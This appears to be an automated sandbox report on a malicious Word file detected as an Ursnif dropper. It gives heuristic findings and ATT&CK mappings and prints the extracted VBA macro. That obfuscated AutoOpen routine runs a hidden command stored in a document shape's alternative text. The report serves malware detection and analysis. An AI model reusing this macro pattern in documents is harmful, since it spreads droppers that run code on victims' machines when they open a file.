MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as a malicious Word document by ClamAV, specifically as a dropper for Ursnif. The presence of an AutoOpen VBA macro, detected by multiple heuristics, indicates that the document is designed to execute malicious code upon opening. The VBA script uses Interaction.Shell to execute a command, likely to download and run a second-stage payload, which is a common Ursnif behavior.
Heuristics 5
-
ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1584 bytes |
SHA-256: 96d36366db9060b513ccde8e593a73920beceada1fba63a0b5b3109e516fe6fa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "mvyvidu" Function fguzymotep() Dim uuRZOzh As Integer Dim hfasurubaho As Long uuRZOzh = 6007# - 3259# Dim nreder As Variant nreder = uuRZOzh - 7978# Dim bFrcEXq As Integer Dim rfivudufawe As Long bFrcEXq = 3844# - 5565# Dim chasyruce As Variant chasyruce = bFrcEXq - 9364# Set fguzymotep = ActiveDocument.Shapes(2) Dim mtCQytlh As Integer Dim CAZDfp As Long mtCQytlh = 7747# - 4430# Dim cjuluv As Variant cjuluv = mtCQytlh - 4055# End Function Sub AutoOpen() Dim jpanufunep As Integer Dim Kvoonya As Long jpanufunep = 1038# - 8429# Dim lsylyzepo As Variant lsylyzepo = jpanufunep - 5033# Set QchXsj = fguzymotep EGXycVq = fguzymotep.AlternativeText Dim YOAHEUr As Integer Dim sbafaqewoto As Long YOAHEUr = 1725# - 5057# Dim yehDvTy As Variant yehDvTy = YOAHEUr - 5473# Dim flamox As Integer Dim YJzoEzvo As Long flamox = 5464# - 4947# Dim lvavefo As Variant lvavefo = flamox - 8047# Interaction.Shell@ _ EGXycVq, vbHide Dim kHFDxvfe As Integer Dim jWrMFO As Long kHFDxvfe = 3070# - 2958# Dim zUnJeFpl As Variant zUnJeFpl = kHFDxvfe - 2577# Dim fqinaruza As Integer Dim jJXFS As Long fqinaruza = 9940# - 1031# Dim qjeqa As Variant qjeqa = fqinaruza - 7460# End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.